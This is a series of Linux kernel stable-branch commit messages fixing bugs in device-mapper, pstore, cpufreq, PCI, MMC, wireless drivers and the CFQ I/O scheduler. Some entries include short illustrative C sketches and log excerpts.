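          set_current_state(TASK_INTERRUPTIBLE);

          if (kthread_should_stop()) {
              __set_current_state(TASK_RUNNING);
              break;
          }

          schedule();
      }
      return 0;
  }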
Fixes: bcbd94ff48 ("dm crypt: fix a possible hang due to race condition on exit")
Cc: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f10e06b744 upstream.
If pg_init_retries is set and a request is queued against a multipath
device with all underlying block device request_queues in the "dying"
state then an infinite loop is triggered because activate_path() never
succeeds and hence never calls pg_init_done().
This change avoids that device removal triggers an infinite loop by
failing the activate_path() which causes the "dying" path to be failed.
Reported-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9dbeaeabac upstream.
Every call of queue_flag_clear_unlocked() after block device
initialization has finished is wrong if blk_cleanup_queue() can be
called concurrently. Convert queue_flag_clear_unlocked() into
queue_flag_clear() and protect it by the block layer queue lock.
Also, factor out dm_mq_start_queue().
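What the factored-out helper could look like, as a sketch under the
locking rule above (not necessarily the exact upstream code):

  static void dm_mq_start_queue(struct request_queue *q)
  {
      unsigned long flags;

      spin_lock_irqsave(q->queue_lock, flags);
      queue_flag_clear(QUEUE_FLAG_STOPPED, q);    /* now under the queue lock */
      spin_unlock_irqrestore(q->queue_lock, flags);

      blk_mq_start_stopped_hw_queues(q, true);
      blk_mq_kick_requeue_list(q);
  }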
Reported-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8dc23658b7 upstream.
dm_resume() will return success (0) rather than -EINVAL if
!dm_suspended_md() upon retry within dm_resume().
Reset the error code at the start of dm_resume()'s retry loop.
Also, remove a useless assignment at the end of dm_resume().
Fixes: ffcc393641 ("dm: enhance internal suspend and resume interface")
Signed-off-by: Minfei Huang <mnghuan@gmail.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3bccbe20f6 upstream.
The MTC packet provides a 8-bit slice of CTC which is related to TSC by
the TMA packet, however the TMA packet only provides the lower 16 bits
of CTC. If mtc_shift > 8 then some of the MTC bits are not in the CTC
provided by the TMA packet. Fix-up the last_mtc calculated from the TMA
packet by copying the missing bits from the current MTC assuming the
least difference between the two, and that the current MTC comes after
last_mtc.
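A sketch of the fix-up, with illustrative names and under the stated
assumptions (the current MTC comes after last_mtc, with the least
difference between the two); the real decoder code differs in detail:

  #include <stdint.h>

  static uint32_t fixup_last_mtc(uint32_t mtc, int mtc_shift, uint32_t last_mtc)
  {
      if (mtc_shift > 8) {
          /* only the low (16 - mtc_shift) bits of the MTC slice are
           * covered by the 16 CTC bits from the TMA packet */
          uint32_t valid_mask = (1u << (16 - mtc_shift)) - 1;

          /* copy the missing high bits from the current MTC ... */
          last_mtc = (mtc & ~valid_mask) | (last_mtc & valid_mask);
          /* ... stepping back if that would put last_mtc after mtc */
          if (last_mtc > mtc)
              last_mtc -= valid_mask + 1;
      }
      return last_mtc & 0xff;    /* MTC is an 8-bit value */
  }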
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Link: http://lkml.kernel.org/r/1475062896-22274-2-git-send-email-adrian.hunter@intel.com
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 810c398bc0 upstream.
Fix occasional decoder errors decoding trace data collected in snapshot
mode.
Snapshot mode can take successive snapshots of trace which might overlap.
The decoder checks whether there is an overlap but only looks at the
current and previous buffer. However buffers that do not contain
synchronization (i.e. PSB) packets cannot be decoded or used for overlap
checking. That means the decoder actually needs to check overlaps between
the current buffer and the previous buffer that contained usable data.
Make that change.
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Masami Hiramatsu <mhiramat@kernel.org>
Cc: Mathieu Poirier <mathieu.poirier@linaro.org>
Link: http://lkml.kernel.org/r/1474641528-18776-10-git-send-email-adrian.hunter@intel.com
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d771fdf941 upstream.
The ramoops buffer may be mapped as either I/O memory or uncached
memory. On ARM64, this results in a device-type (strongly-ordered)
mapping. Since unnaligned accesses to device-type memory will
generate an alignment fault (regardless of whether or not strict
alignment checking is enabled), it is not safe to use memcpy().
memcpy_fromio() is guaranteed to only use aligned accesses, so use
that instead.
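A minimal sketch of the substitution (names illustrative):

  /* memcpy() may issue unaligned accesses, which fault on a device-type
   * mapping; memcpy_fromio() is guaranteed to stay aligned */
  static void ecc_copy_example(void *dst, const void __iomem *src, size_t count)
  {
      memcpy_fromio(dst, src, count);    /* instead of memcpy() */
  }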
Signed-off-by: Andrew Bresticker <abrestic@chromium.org>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Puneet Kumar <puneetster@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7e75678d23 upstream.
persistent_ram_update uses vmap / iomap based on whether the buffer is in
memory region or reserved region. However, both map it as non-cacheable
memory. For armv8 specifically, non-cacheable mapping requests use a
memory type that has to be accessed aligned to the request size. memcpy()
doesn't guarantee that.
Signed-off-by: Furquan Shaikh <furquan@google.com>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Aaron Durbin <adurbin@chromium.org>
Reviewed-by: Olof Johansson <olofj@chromium.org>
Tested-by: Furquan Shaikh <furquan@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d5a9bf0b38 upstream.
I have an FPGA behind PCIe here which exports SRAM which I use for
pstore. Now it seems that the FPGA no longer supports cmpxchg-based
updates; it writes back 0xff…ff and returns the same. This leads to a
crash during a crash, rendering pstore useless.
Since I doubt that there is much benefit from using cmpxchg() here, I am
dropping this atomic access and using the spinlock-based version.
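A sketch of the spinlock-based update; field names follow the ramoops code
but the function itself is illustrative:

  static DEFINE_RAW_SPINLOCK(buffer_lock);

  static size_t buffer_start_add_example(struct persistent_ram_zone *prz,
                                         size_t a)
  {
      unsigned long flags;
      int old, new;

      raw_spin_lock_irqsave(&buffer_lock, flags);

      old = atomic_read(&prz->buffer->start);
      new = old + a;
      while (unlikely(new >= prz->buffer_size))
          new -= prz->buffer_size;
      atomic_set(&prz->buffer->start, new);   /* no cmpxchg on the backing store */

      raw_spin_unlock_irqrestore(&buffer_lock, flags);
      return old;
  }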
Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Rabin Vincent <rabinv@axis.com>
Tested-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
[kees: remove "_locked" suffix since it's the only option now]
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4407de74df upstream.
A basic rmmod ramoops segfaults. Let's see why.
Commit 34f0ec82e0 ("pstore: Correct the max_dump_cnt clearing of
ramoops") sets ->max_dump_cnt to zero before looping over ->przs, but we
didn't use it before that either. And since commit ee1d267423 ("pstore:
add pstore unregister") we free that memory on rmmod.
But even then, we looped until a NULL pointer or ERR. I don't see where
it is ensured that the last member is NULL. Let's try this instead:
simplify error recovery and freeing. Clean up in the error case where
resources were allocated, and then, in the free path, rely on
->max_dump_cnt.
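A sketch of the free path relying on ->max_dump_cnt (a sketch of the idea
described above, not necessarily the exact upstream code):

  static void ramoops_free_przs_example(struct ramoops_context *cxt)
  {
      int i;

      /* free exactly what was allocated instead of scanning for NULL */
      for (i = 0; i < cxt->max_dump_cnt; i++)
          persistent_ram_free(cxt->przs[i]);

      kfree(cxt->przs);
      cxt->max_dump_cnt = 0;
  }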
Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Namhyung Kim <namhyung@kernel.org>
Acked-by: Namhyung Kim <namhyung@kernel.org>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 65bf34f595 upstream.
Increase the initial kernel default page mapping size for 64-bit kernels to
64 MB and for 32-bit kernels to 32 MB.
Due to the additional support of ftrace, tracepoint and huge pages the kernel
size can exceed the sizes we used up to now.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f8850abb7b upstream.
Architecturally we need to keep __gp below 0x1000000.
But because of ftrace and tracepoint support, the RO_DATA_SECTION now gets much
bigger than it was before. By moving the linkage tables in front of
RO_DATA_SECTION we can avoid __gp being positioned at too high an address.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 92420bd0d0 upstream.
The config option HAVE_UNSTABLE_SCHED_CLOCK is set automatically when compiling
for SMP. There is no need to clear the stable-clock flag via
clear_sched_clock_stable() when starting secondary CPUs, and even worse,
clearing it triggers wrong self-detected CPU stall warnings on 64bit Mako
machines.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 690d097c00 upstream.
Increase the initial kernel default page mapping size for SMP kernels to 32MB
and add a runtime check which panics early if the kernel is bigger than the
initial mapping size.
This fixes boot crashes of 32bit SMP kernels. Due to the introduction of huge
page support in kernel 4.4 and its required initial kernel layout in memory, a
32bit SMP kernel usually got bigger (in layout, not size) than 16MB.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f9f4872df6 upstream.
There is a requirement that the MSR_PM_ENABLE MSR must be set to 0x01
before reading MSR_HWP_CAPABILITIES on a given CPU. If cpufreq init() is
scheduled on a CPU which is not the same as policy->cpu, or migrates to a
different CPU before the MSR read for MSR_HWP_CAPABILITIES, it is possible
that MSR_PM_ENABLE was not set to 0x01 on that CPU. This will cause a GP
fault. So, as in other places in this path, rdmsrl_on_cpu() should be used
instead of rdmsrl().
Moreover, the scope of MSR_HWP_CAPABILITIES is per thread, so it should be
read from the same CPU for which MSR_HWP_REQUEST is being set.
dmesg dump or warning:
[ 22.014488] WARNING: CPU: 139 PID: 1 at arch/x86/mm/extable.c:50 ex_handler_rdmsr_unsafe+0x68/0x70
[ 22.014492] unchecked MSR access error: RDMSR from 0x771
[ 22.014493] Modules linked in:
[ 22.014507] CPU: 139 PID: 1 Comm: swapper/0 Not tainted 4.7.5+ #1
...
...
[ 22.014516] Call Trace:
[ 22.014542] [<ffffffff813d7dd1>] dump_stack+0x63/0x82
[ 22.014558] [<ffffffff8107bc8b>] __warn+0xcb/0xf0
[ 22.014561] [<ffffffff8107bcff>] warn_slowpath_fmt+0x4f/0x60
[ 22.014563] [<ffffffff810676f8>] ex_handler_rdmsr_unsafe+0x68/0x70
[ 22.014564] [<ffffffff810677d9>] fixup_exception+0x39/0x50
[ 22.014604] [<ffffffff8102e400>] do_general_protection+0x80/0x150
[ 22.014610] [<ffffffff817f9ec8>] general_protection+0x28/0x30
[ 22.014635] [<ffffffff81687940>] ? get_target_pstate_use_performance+0xb0/0xb0
[ 22.014642] [<ffffffff810600c7>] ? native_read_msr+0x7/0x40
[ 22.014657] [<ffffffff81688123>] intel_pstate_hwp_set+0x23/0x130
[ 22.014660] [<ffffffff81688406>] intel_pstate_set_policy+0x1b6/0x340
[ 22.014662] [<ffffffff816829bb>] cpufreq_set_policy+0xeb/0x2c0
[ 22.014664] [<ffffffff81682f39>] cpufreq_init_policy+0x79/0xe0
[ 22.014666] [<ffffffff81682cb0>] ? cpufreq_update_policy+0x120/0x120
[ 22.014669] [<ffffffff816833a6>] cpufreq_online+0x406/0x820
[ 22.014671] [<ffffffff8168381f>] cpufreq_add_dev+0x5f/0x90
[ 22.014717] [<ffffffff81530ac8>] subsys_interface_register+0xb8/0x100
[ 22.014719] [<ffffffff816821bc>] cpufreq_register_driver+0x14c/0x210
[ 22.014749] [<ffffffff81fe1d90>] intel_pstate_init+0x39d/0x4d5
[ 22.014751] [<ffffffff81fe13f2>] ? cpufreq_gov_dbs_init+0x12/0x12
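A minimal sketch of the substitution described above (the helper is
hypothetical):

  static void hwp_read_caps_example(unsigned int cpu)
  {
      u64 cap;

      /* rdmsrl() reads on whatever CPU we happen to run on and can fault
       * if MSR_PM_ENABLE was not set to 0x01 there */
      rdmsrl_on_cpu(cpu, MSR_HWP_CAPABILITIES, &cap);
      pr_debug("HWP capabilities on CPU%u: 0x%llx\n", cpu, cap);
  }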
Signed-off-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit abb6627910 upstream.
Commit d352cf47d9 (cpufreq: conservative: Do not use transition
notifications) overlooked the case when the "frequency step" used
by the conservative governor is small relative to the distances
between the available frequencies and broke the algorithm by
using policy->cur instead of the previously requested frequency
when computing the next one.
As a result, the governor may not be able to go outside of a narrow
range between two consecutive available frequencies.
Fix the problem by making the governor save the previously requested
frequency and select the next one relative to that value (unless it is
out of range, in which case policy->cur will be used instead).
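A sketch of the idea under stated assumptions; the struct, field, and
helper names here are illustrative, not the governor's actual code:

  struct cs_policy_state {
      unsigned int requested_freq;    /* last frequency we asked for */
  };

  static unsigned int cs_next_freq(struct cs_policy_state *st,
                                   struct cpufreq_policy *policy,
                                   unsigned int freq_step, bool increase)
  {
      unsigned int freq = st->requested_freq;

      /* start from the stored request, not policy->cur, so small steps
       * can accumulate across the gap between two available frequencies */
      if (freq > policy->max || freq < policy->min)
          freq = policy->cur;

      if (increase)
          freq = min(freq + freq_step, policy->max);
      else
          freq = freq > policy->min + freq_step ? freq - freq_step
                                                : policy->min;

      st->requested_freq = freq;
      return freq;
  }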
Fixes: d352cf47d9 (cpufreq: conservative: Do not use transition notifications)
Link: https://bugzilla.kernel.org/show_bug.cgi?id=177171
Reported-and-tested-by: Aleksey Rybalkin <aleksey@rybalkin.org>
Acked-by: Viresh Kumar <viresh.kumar@linaro.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e01072d22d upstream.
Now that the cpufreq-dt-platdev is used to create the cpufreq-dt platform
device for all OMAP platforms and the platform code that did it
before has been removed, add ti,am33xx and ti,dra7xx to the machine list
in cpufreq-dt-platdev which had relied on the removed platform code to do
this previously.
Fixes: 7694ca6e1d (cpufreq: omap: Use generic platdev driver)
Signed-off-by: Dave Gerlach <d-gerlach@ti.com>
Acked-by: Viresh Kumar <viresh.kumar@linaro.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e330b9a6bb upstream.
of_irq_get[_byname]() return 0 iff the irq_create_of_mapping() call fails.
Returning both an error code and 0 on failure is a sign of a misdesigned
API; it makes the failure check unnecessarily complex and error prone. We
should
rely on the platform IRQ resource in this case, not return 0, especially
as 0 can be a valid IRQ resource too...
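A sketch of the resulting probing order (a sketch of the described
behaviour, not the exact upstream code):

  static int example_platform_get_irq(struct platform_device *dev,
                                      unsigned int num)
  {
      struct resource *r;
      int irq;

      if (dev->dev.of_node) {
          irq = of_irq_get(dev->dev.of_node, num);
          /* treat 0 (mapping failure) like an error and fall through */
          if (irq > 0 || irq == -EPROBE_DEFER)
              return irq;
      }

      r = platform_get_resource(dev, IORESOURCE_IRQ, num);
      return r ? r->start : -ENXIO;
  }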
Fixes: aff008ad81 ("platform_get_irq: Revert to platform_get_resource if of_irq_get fails")
Signed-off-by: Sergei Shtylyov <sergei.shtylyov@cogentembedded.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8dd99bca7b upstream.
The tegra_pcie_phy_disable() path called pads_writel() with arguments in
the wrong order. Swap them to be the "value, offset" order expected by
pads_writel().
Fixes: 6fe7c187e0 ("PCI: tegra: Support per-lane PHYs")
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Thierry Reding <treding@nvidia.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8e2e031799 upstream.
Similar to the AR93xx and the AR94xx series, the AR95xx also have the same
quirk for the Bus Reset. It will lead to instant system reset if the
device is assigned via VFIO to a KVM VM. I've been able to reproduce this
behavior with a MikroTik R11e-2HnD.
Fixes: c3e59ee4e7 ("PCI: Mark Atheros AR93xx to avoid bus reset")
Signed-off-by: Maik Broemme <mbroemme@libmpq.org>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 02265cd603 upstream.
Potentially overflowing expression 1000000 * data->timeout_clks with
type unsigned int is evaluated using 32-bit arithmetic, and then used
in a context that expects an expression of type unsigned long long.
To avoid overflow, cast 1000000U to type unsigned long long.
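A minimal sketch of the cast (variable names illustrative):

  static u64 timeout_clks_to_ns(unsigned int timeout_clks, unsigned int clock)
  {
      /* 1000000 * timeout_clks overflows in 32-bit arithmetic */
      u64 ns = 1000000ULL * timeout_clks;

      do_div(ns, clock);
      return ns;
  }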
Special thanks to Coverity.
Fixes: 7f05538af7 ("mmc: sdhci: fix data timeout (part 2)")
Signed-off-by: Haibo Chen <haibo.chen@nxp.com>
Acked-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0ed50abb2d upstream.
CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed multi-block transfers to be
terminated only with CMD12.
The patch fixes the following problem:
mmc0: new MMC card at address 0001
mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
...
blk_update_request: I/O error, dev mmcblk0, sector 0
Buffer I/O error on dev mmcblk0, logical block 0, async page read
mmcblk0: unable to read partition table
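A sketch of gating CMD23 on the card's spec version; the field and flag
names below are assumptions based on the MMC core, not a quote of the fix:

  /* Hypothetical sketch: only advertise CMD23 for MMC v3.1+ cards */
  if (mmc_card_mmc(card) && card->csd.mmca_vsn >= CSD_SPEC_VER_3)
      md->flags |= MMC_BLK_CMD23;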
Signed-off-by: Daniel Glöckner <dg@emlix.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0c9d349153 upstream.
Some RTL8821AE devices sold in Great Britain have the country code of
0x25 encoded in their EEPROM. This value is not tested in the routine
that establishes the regulatory info for the chip. The fix is to set
this code to have the same capabilities as the EU countries. In addition,
the channels allowed for COUNTRY_CODE_ETSI were more properly suited
for China and Israel, not the EU. This problem has also been fixed.
Signed-off-by: Larry Finger <Larry.Finger@lwfinger.net>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0628467f97 upstream.
Firmware runs a watchdog timer to track the copy engine ring read and
write indices. Whenever both indices are stuck at the same location for a
given duration, the watchdog is triggered to assert the target. While
updating the copy engine destination ring write index, the driver ensures
that the write index will not be the same as the read index by finding the
delta between these two indices (CE_RING_DELTA).
The HTT target-to-host copy engine (CE5) is a special case where ring
buffers are reused and the delta check is not applied while updating the
write index. In a rare scenario, whenever the CE5 ring is full, both
indices will refer to the same location, causing the CE ring stuck issue
explained above. This issue was originally reported on IPQ4019 during
long-hour stress testing and during Veriwave max-clients test suites. The
same issue is also observed on other chips. Fix this by ensuring that the
write index is one less than the read index, which means that the full
ring is available for receiving data.
Tested-by: Tamizh chelvam <c_traja@qti.qualcomm.com>
Signed-off-by: Rajkumar Manoharan <rmanohar@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c8a9a6dacc upstream.
There are two definitions of the devfreq_event_get_drvdata() function in
devfreq-event.h when CONFIG_PM_DEVFREQ_EVENT is disabled, which leads to a
build failure. So remove the duplicate devfreq_event_get_drvdata()
function.
Fixes: f262f28c14 ("PM / devfreq: event: Add devfreq_event class")
Signed-off-by: Lin Huang <hl@rock-chips.com>
Signed-off-by: Chanwoo Choi <cw00.choi@samsung.com>
Signed-off-by: MyungJoo Ham <myungjoo.ham@samsung.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0278b34bf1 upstream.
Sometimes spidev_test crashes with:
*** Error in `spidev_test': munmap_chunk(): invalid pointer: 0x00022020 ***
Aborted
or just
Segmentation fault
This is due to transfer_escaped_string() miscalculating the required
size of the buffer by one byte, causing a buffer overflow in unescape().
Drop the bogus "+ 1" in the strlen() parameter to fix this.
Note that unescape() never copies the zero-terminator of the source
string, so it writes at most as many bytes as the length of the source
string.
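A sketch of the corrected size calculation (identifier names illustrative):

  #include <stdint.h>
  #include <stdlib.h>
  #include <string.h>

  static void transfer_escaped_string_example(const char *str)
  {
      size_t size = strlen(str);    /* was strlen(str + 1): one byte short */
      uint8_t *tx = malloc(size);   /* unescape() writes at most size bytes */

      if (!tx)
          return;
      /* ... unescape((char *)tx, str, size); transfer(...); ... */
      free(tx);
  }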
Fixes: 30061915be (spi: spidev_test: Added input buffer from the terminal)
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b1d51b448e upstream.
The current clock tree only implements the minimal set of differences
between the i.MX6Q and the i.MX6DL, but that doesn't really reflect
reality.
Apply the following fixes to match the RM:
- DL has no GPU3D_SHADER_SEL/PODF, the shader domain is clocked by
GPU3D_CORE
- GPU3D_SHADER_SEL/PODF has been repurposed as GPU2D_CORE_SEL/PODF
- GPU2D_CORE_SEL/PODF has been repurposed as MLB_SEL/PODF
Signed-off-by: Lucas Stach <l.stach@pengutronix.de>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8846023ae upstream.
Initialize the GPU clock muxes to sane inputs. Until now they have
not been changed from their default values, which means that both
GPU3D shader and GPU2D core were fed by clock inputs whose rates
exceed the maximum allowed frequency of the cores by as much as
200MHz.
This fixes a severe GPU stability issue on i.MX6DL.
Signed-off-by: Lucas Stach <l.stach@pengutronix.de>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8f9165c981 upstream.
http://www.ti.com/lit/pdf/SWCZ010:
DCDC o/p voltage can go higher than programmed value
Impact:
VDD1, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.
Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
clock of VDD1 and VDD2
* Turn-on of the VDD1 and VDD2 HSD PFET is synchronized or at a constant
phase shift
* Current pulled through VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
possible switching noise on the application. This noise level depends
on the layout, the VBAT level, and the load current. The noise level
increases with improper layout.
When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled through VCC1+VCC2 averages Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
causing lower overall switching noise.
Workaround:
Set DCDCCTRL_REG[1:0]= 00.
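A minimal sketch of such a workaround via the generic regmap API; the register
and mask macro names here are assumptions, not necessarily the driver's:
/* clear DCDCCTRL[1:0] so VDD1/VDD2 run on their own 3-MHz oscillators */
ret = regmap_update_bits(regmap, TPS65910_DCDCCTRL, DCDC_CLK_SYNC_MASK, 0);
if (ret)
        dev_err(dev, "failed to apply the SWCZ010 workaround\n");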
Signed-off-by: Jan Remmet <j.remmet@phytec.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d71cf15b86 upstream.
Since the beginning of gpio-mpc8xxx.c, "handle_level_irq" has been used
to handle GPIO interrupts on the PowerPC/Layerscape platforms. But
actually, almost all PowerPC/Layerscape platforms
assert an interrupt request upon either a high-to-low change or
any change on the state of the signal.
So the "handle_level_irq" is not reasonable for PowerPC/Layerscape
GPIO interrupt, it should be "handle_edge_irq". Otherwise the system
may lost some interrupts from the PIN's state changes.
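A minimal sketch of the resulting mapping call (the irq_chip variable name is
an assumption):
/* treat GPIO interrupts as edge events rather than level events */
irq_set_chip_and_handler(virq, &mpc8xxx_irq_chip, handle_edge_irq);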
Signed-off-by: Liu Gang <Gang.Liu@nxp.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3932a86b4b upstream.
While debugging timeouts happening in my application workload (ScyllaDB), I have
observed calls to open() taking a long time, ranging everywhere from 2 seconds -
the first ones that are enough to time out my application - to more than 30
seconds.
The problem seems to happen because XFS may block on pending metadata updates
under certain circumstances, and that's confirmed with the following backtrace
taken by the offcputime tool (iovisor/bcc):
ffffffffb90c57b1 finish_task_switch
ffffffffb97dffb5 schedule
ffffffffb97e310c schedule_timeout
ffffffffb97e1f12 __down
ffffffffb90ea821 down
ffffffffc046a9dc xfs_buf_lock
ffffffffc046abfb _xfs_buf_find
ffffffffc046ae4a xfs_buf_get_map
ffffffffc046babd xfs_buf_read_map
ffffffffc0499931 xfs_trans_read_buf_map
ffffffffc044a561 xfs_da_read_buf
ffffffffc0451390 xfs_dir3_leaf_read.constprop.16
ffffffffc0452b90 xfs_dir2_leaf_lookup_int
ffffffffc0452e0f xfs_dir2_leaf_lookup
ffffffffc044d9d3 xfs_dir_lookup
ffffffffc047d1d9 xfs_lookup
ffffffffc0479e53 xfs_vn_lookup
ffffffffb925347a path_openat
ffffffffb9254a71 do_filp_open
ffffffffb9242a94 do_sys_open
ffffffffb9242b9e sys_open
ffffffffb97e42b2 entry_SYSCALL_64_fastpath
00007fb0698162ed [unknown]
Inspecting my run with blktrace, I can see that the xfsaild kthread exhibits
very high "Dispatch wait" times, in the range of dozens of seconds and
consistent with the open() times I have seen in that run.
Still from the blktrace output, we can, after searching a bit, identify the
request that wasn't dispatched:
8,0 11 152 81.092472813 804 A WM 141698288 + 8 <- (8,1) 141696240
8,0 11 153 81.092472889 804 Q WM 141698288 + 8 [xfsaild/sda1]
8,0 11 154 81.092473207 804 G WM 141698288 + 8 [xfsaild/sda1]
8,0 11 206 81.092496118 804 I WM 141698288 + 8 ( 22911) [xfsaild/sda1]
<==== 'I' means Inserted (into the IO scheduler) ===================================>
8,0 0 289372 96.718761435 0 D WM 141698288 + 8 (15626265317) [swapper/0]
<==== Only 15s later the CFQ scheduler dispatches the request ======================>
As we can see above, in this particular example CFQ took 15 seconds to dispatch
this request. Going back to the full trace, we can see that the xfsaild queue
had plenty of opportunity to run, and it was selected as the active queue many
times. It would just always be preempted by something else (example):
8,0 1 0 81.117912979 0 m N cfq1618SN / insert_request
8,0 1 0 81.117913419 0 m N cfq1618SN / add_to_rr
8,0 1 0 81.117914044 0 m N cfq1618SN / preempt
8,0 1 0 81.117914398 0 m N cfq767A / slice expired t=1
8,0 1 0 81.117914755 0 m N cfq767A / resid=40
8,0 1 0 81.117915340 0 m N / served: vt=1948520448 min_vt=1948520448
8,0 1 0 81.117915858 0 m N cfq767A / sl_used=1 disp=0 charge=0 iops=1 sect=0
where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB
IO dispatchers.
The requests preempting the xfsaild queue are synchronous requests. That's a
characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests.
While it can be argued that preempting ASYNC requests in favor of SYNC is part
of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's
goal.
Moreover, unless I am misunderstanding something, that breaks the expectation
set by the "fifo_expire_async" tunable, which in my system is set to the
default.
Looking at the code, it seems to me that the issue is that after we make
an async queue active, there is no guarantee that it will execute any request.
When the queue itself tests whether it may dispatch in cfq_may_dispatch(), it
can bail if it sees SYNC requests in flight. An incoming request from another
queue can also preempt it in such a situation before we have the chance to
execute anything (as seen in the trace above).
This patch sets the must_dispatch flag if we notice that we have requests
that are already fifo_expired. This flag is always cleared after
cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin
the queue for subsequent requests (unless they are themselves expired).
Care is taken during preempt to still allow rt requests to preempt us
regardless.
